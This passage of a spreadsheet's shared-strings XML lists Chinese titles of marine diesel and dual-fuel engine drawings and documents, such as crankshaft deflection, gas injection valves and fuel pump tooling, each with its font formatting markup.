    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴端部间隙</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴功能测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴拐档差</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报告：自动记录</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴拐档差记录</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴拐档差</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴焊接说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴和法兰质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴和主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴后端视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴减震器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴链轮安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴偏斜</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴偏斜工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴前端静负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴前端视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴室监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴箱防爆门</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴箱监测箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴销工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴形状</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置公差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴轴承选配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴总成起吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃排气驱动机构其它部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油图表布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气安全系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气柴油机惰性气体系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气柴油机气体供给系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气阀头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气管系统，燃气柴油机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气进口塞块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气喷射阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气喷嘴，钻孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气探测监视器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气探测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气通气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双燃料系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧空气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧空气图解</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧空气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧室</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气驱动装置液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵备件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵拆卸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵拆卸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵齿轮加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵齿条</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵传动机构明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵传感器组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵吊装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵放泄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵放泄阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵供货图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵管系入口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滚轮导套吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滑油进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵缓冲器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵加热管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵壳体，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵壳体吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵控制设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵清洁系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵球轴承槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵驱动装置组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵升程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵升程测量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵套筒与顶盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵吸入阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵预滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵运行说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵柱塞套筒装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油初级泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油除气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油促动阀，工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油单元布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油单元的电路图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油单元的管路系统</t>
    </r>
